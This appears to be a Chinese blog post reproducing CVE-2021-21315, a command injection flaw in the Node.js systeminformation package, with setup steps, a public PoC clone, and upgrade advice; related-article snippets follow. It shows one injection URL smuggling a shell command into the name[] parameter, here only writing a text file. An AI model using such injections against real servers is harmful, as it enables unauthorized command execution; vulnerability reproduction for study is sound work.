CVE-2021-21315

最新推荐文章于 2024-06-11 10:01:02 发布
最新推荐文章于 2024-06-11 10:01:02 发布
阅读量2k 收藏
点赞数
分类专栏: 漏洞复现 linux sudoNode.js 文章标签: 安全漏洞 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48300170/article/details/118891918
版权

CVE-2021-21315 Linux sudoNode.js命令注入漏洞复现

漏洞简介

      Node.js-systeminformation是用于获取各种系统信息的Node.JS模块,它包含多种轻量级功能,可以检索详细的硬件和系统相关信息。
      2021年02月24日,npm团队发布安全公告,Node.js库中的systeminformation软件包中存在一个命令注入漏洞CVE-2021-21315,攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令,最终获取服务器最高权限。

影响版本
    Systeminformation < 5.3.1

漏洞信息

漏洞名称漏洞编号危害等级
Linux sudoNode.js命令注入漏洞CVE-2021-21315高危
CVSS评分漏洞组件受影响版本
7.8Node.js-systeminformationSysteminformation < 5.3.1

环境搭建

  • Linux操作系统(Ubuntu)
  • nodejs(linux)

漏洞复现

1.Nodejs安装

Wget https://nodejs.org/dist/v12.18.4/node-v12.18.4-linux-x64.tar.xz

tar -xvf node-v12.18.4-linux-x64.tar.xz
mv node-v12.18.4-linux-x64 nodejs
sudo mv nodejs/ /usr/local/sbin/
sudo ln -s /usr/local/sbin/nodejs/bin/node /usr/local/bin/
sudo ln -s /usr/local/sbin/nodejs/bin/npm /usr/local/bin/

2.POC下载

git clone git://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC

3.nodejs起http

node index.js

4.执行poc

http://192.168.32.161:8000/api/getServices?name[]=$(echo -e ‘NULL’ > 1.txt)

漏洞修复

  • 建议将 systeminformation 及时升级到 5.3.1 或更高版本
NULL呀
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Node.Js命令执行漏洞(CVE-2021-21315)复现及排查
dayouzi的博客
08-15 1252
Node.js是一个基于Chrome V8引擎的JavaScript运行环境,用于方便的搭建响应速度快、易于拓展的网络应用。Node使用Module模块划分不同的功能,每一个模块都包含非常丰富的函数,如http就包含了和http相关的很多函数,帮助开发者对http、tcp/udp等进行操作或创建相关服务器。Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数中注入payload执行系统命令。
CVE-2021-21315-PoC:CVE 2021-21315 PoC
03-03
CVE-2021-21315系统信息 这是的概念证明,它影响到的系统信息库(npm程序包“ systeminformation”)。 “请务必检查或清理传递给si.inetLatency(),si.inetChecksite(),si.services(),si.processLoad()的服务参数...仅允许使用字符串,拒绝任何数组。字符串清理如预期般运作。” 因为没有很好地解释漏洞(我认为),所以我决定根据系统信息的漏洞版本编写小型应用程序。 PoC包含: 使用明确的易受攻击的系统信息测试Node.js中制作的应用 简单测试有效负载即可在受影响的计算机上创建.txt文件 重现步骤: 在Linux服务器环境上运行应用程序 向site.com/api/getServices?name=nginx发出GET请求(nginx只是示例) 现在尝试发送这样的请求:yoursite.co
探索Node.js安全边界:CVE-2021-21315-systeminformation深度剖析与应用
最新发布
gitblog_00043的博客
06-11 338
探索Node.js安全边界:CVE-2021-21315-systeminformation深度剖析与应用 项目地址:https://gitcode.com/ForbiddenProgrammer/CVE-2021-21315-PoC 在日益复杂的网络环境中,系统安全成为每个开发者和运维人员关注的焦点。今天,我们将深入探讨一个针对Node.js生态系统中的特定漏洞——CVE-2021-21315,...
nodejs 获取计算机信息
10-26
//cpu架构 arch: os.arch(), //操作系统内核 type: os.type(), //操作系统平台 platform: os.platform(), //系统开机时间 uptime: dealTime(os.uptime()), //主机名 hostname: os.hostname(), //主目录 homedir: os.homedir(), // 内存大小 totalmem: dealMem(os.totalmem()), // 已使用内存 free
node.js 命令执行 (CVE-2021-21315)复现[VULFOCUS]
m0_37638874的博客
09-06 1935
Node.js-systeminformation是用于获取各种系统信息的Node.JS模块,它包含多种轻量级功能,可以检索详细的硬件和系统相关信息 npm团队发布安全公告,Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315),其CVSSv3评分为7.8。攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令。里注册申请一个账号,得到一个申请的网址。
systeminformation:Node.JS的系统信息库
03-11
系统信息 node.js的系统和操作系统信息库 · · 这真太了不起了。 该项目最初只是一个针对我自己的小项目,现已拥有10,000行以上的代码,发布了400多个版本,每月最多3次mio下载,整体上超过30 mio下载。 感谢所有为这个项目做出贡献的人! 新版本5.0 新版本5在这里-我花了数周的时间来完成这个新版本的定稿。 非常感谢您的支持- 下一个主要版本发布5.0带有新功能,并进行了一些改进和更改(其中一些正在更改)! 添加的音频:获取详细的音频设备信息 添加了蓝牙:获取详细的蓝牙设备信息 添加了dockerImages,dockerVolumes:获取有关docker映像和卷的详细信息 添加的打印机:从检测到的打印机获取信息 添加了USB:获取详细的USB控制器和设备信息 添加了wifi接口ans连接:扩展了wifi信息 更好的uuid功能以获得唯一的硬件和操作系统UUID
Node.js-systeminformation-用于获取各种系统信息的Node.JS模块
08-10
包含35种轻量级功能,可以获取详细的硬件,系统和操作系统信息(支持Linux,macOS,部分Windows,FreeBSD和SunOS) - 没有npm依赖。
CVE-2021-21315v2
05-07
CVE-2021-21315系统信息 这是的概念证明,它影响到的系统信息库(npm程序包“ systeminformation”)。 “请务必检查或清理传递给si.inetLatency(),si.inetChecksite(),si.services(),si.processLoad()...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
**Laravel 框架中的 CVE-2021-3129 漏洞详解及 EXP 利用** Laravel 是一个流行的开源 PHP Web 应用框架,以其优雅的语法和强大的功能深受开发者喜爱。然而,就像任何其他软件一样,Laravel 也存在安全漏洞。其中之...
CVE-2021-26855
03-12
**CVE-2021-26855:Exchange Server 漏洞详解** CVE-2021-26855 是一个影响 Microsoft Exchange Server 的高严重性漏洞,该漏洞允许远程未经身份验证的攻击者执行任意代码,从而获取对目标系统的完全控制。这个漏洞...
systemInformation:一组用于整理环境中系统信息的脚本,以及一些 html 和 js 文件,以有用的格式显示信息
06-05
系统信息 一组脚本,用于整理有关环境中系统的信息,以及一些 html 和 js 文件以以有用的格式显示信息。 收集信息的脚本对物理系统的组织和环境中的技术选择做出了许多假设。 此外,收集脚本和显示格式包含了许多关于拥有组织的假设。 这些应该是相对可配置的,后面会详细介绍。 前端文件可以完全独立于收集脚本使用,前提是从您的组织收集的数据可以组装成以下格式的 javascript 文件: var systems = { "servers": [ { "name": "xxx", "ipAddr": "10.10.10.10", "state": "running", // or "shut" "cpus": "96", "maxMem": "33325056", "usedMem": "33325031", "own
框架漏洞-CVE复现-Node.JS+Jquery+Django+Flask
xiaoheizi的博客
07-18 793
Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。访问:/admin/vuln/collection/?描述:Node.js-systeminformation是用于获取各种信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数注入payload执行系统命令。添加请求路径:/static/../../../a/../../../../etc/passwd 成功获取敏感信息。
ip分片代码_CVE202016898 “坏邻居”Windows TCP/IP 远程代码执行漏洞分析
weixin_39791225的博客
11-24 469
本文作者 Strawberry@ QAX A-TEAM2020年10月14日,微软修复了一个紧急漏洞:Windows TCP/IP 远程代码执行漏洞,漏洞编号为 CVE-2020-16898。Windows TCP/IP 堆栈在处理 ICMPv6 路由器广告数据包时,存在一个远程执行代码漏洞。攻击者可通过向受影响主机发送特制 ICMPv6 路由广告包来利用此漏洞,成功利用此漏洞的攻击...
Windows tcp ip远程代码执行漏洞(CVE-2020-16898)复现
weixin_47531489的博客
07-20 792
1 简介 CVE-2020-16898,又称“Bad Neighbor”。Windows TCP/IP堆栈不正确地处理ICMPv6 Router Advertisement数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。要利用此漏洞,攻击者必须将经过特殊设计的ICMPv6 Router Advertisement数据包发送到远程Windows计算机上。 2 漏洞概述 当 Windows TCP/IP 堆栈不正确地处理使用 Option Type
linux sudo权限_Linux的Sudo存在安全漏洞 攻击者可运行root命令
weixin_39724009的博客
11-24 91
站长之家(ChinaZ.com) 10月15日 消息:据engadget消息,如果您在Linux或基于Unix的平台(如macOS)中使用过命令行,那么可能熟悉“sudo”命令。作为一个系统命令,Sudo允许用户以特殊权限来运行任务,而无需切换使用环境通常以 root 用户身份运行命令。目前,开发人员修复了sudo存在的一个安全漏洞,该漏洞即便配置中明确禁止 root 用户访问,仍可允许恶意用户或...
CVE-2021-21315 Linux sudoNode.js命令注入
weixin_47179815的博客
07-15 1538
Node.js是一个基于ChromeV8引擎的JavaScript运行环境,用于方便的搭建响应速度快、易于拓展的网络应用,它包含多种轻量级功能,可以检索详细的硬件和系统相关信息。Node使用Module模块划分不同的功能,每一个模块都包含非常丰富的函数,如http就包含了和http相关的很多函数,帮助开发者对http、tcp/udp等进行操作或创建相关服务器。...
CVE-2021-3156:Sudo 堆缓冲区溢出漏洞通告
爱国小白帽
01-27 4124
报告编号:B6-2021-012701 报告来源:360CERT 报告作者:360CERT 更新日期:2021-01-27 0x01漏洞简述 2021年01月27日,360CERT监测发现RedHat发布了sudo 缓冲区/栈溢出漏洞的风险通告,该漏洞编号为CVE-2021-3156,漏洞等级:高危,漏洞评分:7.0。 攻击者在取得服务器基础权限的情况下,可以利用sudo基于堆的缓冲区溢出漏洞,获得root权限。 目前debain已经修复该漏洞,centos依然受到影响 对此,360CERT建议广大用户及.
cve-2021-3156 POC漏洞利用方式以及修复办法
热门推荐
网站安全专家
01-28 1万+
临近2021春节年末,我们SINE安全监测中心发现Linux系统被爆出致命漏洞,导致大部分服务器受到黑客的攻击与入侵,该漏洞发生的根源是由于系统的管理命令。SUDO存在问题,导致普通用户无需输入root密码,可以直接使用sudo命令提权到root管理员权限,这漏洞是今年linux爆出的最大的漏洞,危害性极高,目前受漏洞影响的Linux版本是Linux Sudo1.8.2- 1.8.31p2 LinuxSudo1.9.0- 1.9.5 p1等版本,可以说是大多数的linux系统都有漏洞。目前我们已对SINE.
CVE-2021-28041复现
03-13
CVE-2021-28041是一个安全漏洞,它影响了某个软件或系统的特定版本。由于我无法得知你具体指的是哪个软件或系统的CVE-2021-28041漏洞,因此无法提供具体的复现步骤。但是,我可以给你一些一般性的复现漏洞的方法和建议。 要复现CVE-2021-28041漏洞,通常需要以下步骤: 1. 确定受影响的软件或系统版本:首先,你需要确定你使用的软件或系统是否受到CVE-2021-28041漏洞的影响。可以查看相关厂商或组织发布的安全公告或漏洞报告来获取这些信息。 2. 了解漏洞的详细信息:阅读CVE-2021-28041漏洞的详细描述和相关文档,了解漏洞的原理和影响范围。这将帮助你更好地理解漏洞,并为复现做好准备。 3. 搭建实验环境:在一个安全的环境中,搭建一个与受影响软件或系统版本相匹配的实验环境。这可以是一个虚拟机、容器或者专门用于安全测试的实验环境。 4. 复现漏洞:根据漏洞的描述和相关文档,尝试复现CVE-2021-28041漏洞。这可能涉及到构造特定的输入、触发特定的操作或者利用软件或系统中的某个弱点。 5. 验证漏洞:一旦成功复现漏洞,验证漏洞的存在和影响。这可以通过观察系统行为、获取敏感信息或者执行未授权的操作来进行验证。 请注意,复现漏洞是一项敏感的活动,需要在合法授权和合法范围内进行。在进行任何安全测试之前,请确保你已经获得了相关授权,并遵守法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值